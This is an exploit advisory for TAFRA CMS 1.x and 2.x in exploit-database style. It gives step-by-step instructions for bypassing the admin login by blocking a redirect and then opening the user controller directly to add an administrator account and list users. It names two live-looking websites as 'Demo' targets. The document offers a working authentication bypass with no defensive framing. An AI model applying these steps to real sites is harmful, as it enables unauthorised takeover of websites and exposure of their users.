# Exploit Title: [TAFRA CMS "Add Admin ]
# Google Dork: [Use Your Brain !]
# Date: [3-5-2017]
# Exploit Author: [Mgm-Eg]
# Vendor Homepage: [http://www.sotmasr.com/tafra.php]
# Version: [1.X.X] & [2.X.X]
# Contact: [https://ask.fm/m1g1m]
# Contact2:[https://www.facebook.com/llmgm.egll]
---------------
- | POC | -
---------------
>>>Version [1.X.X]<<<
[Add Admin]
- Open http://site.com/admin/
- Will redirect you to http://site.com/admin/controllers/login.php
- Use NoRedirect & Add ^http://site.com/admin/controllers/login.php
- Open http://site.com/admin/controllers/userController.php
>>> Then Add Your Admin <<<
- To desplay users open > http://site.com/admin/controllers/userController.php?do=show
--------------------------------------------------------------------------------------
Demo
[http://www.elkhabareg.com/]
[http://news.sotmasr.com/v1/]
-------------------------------
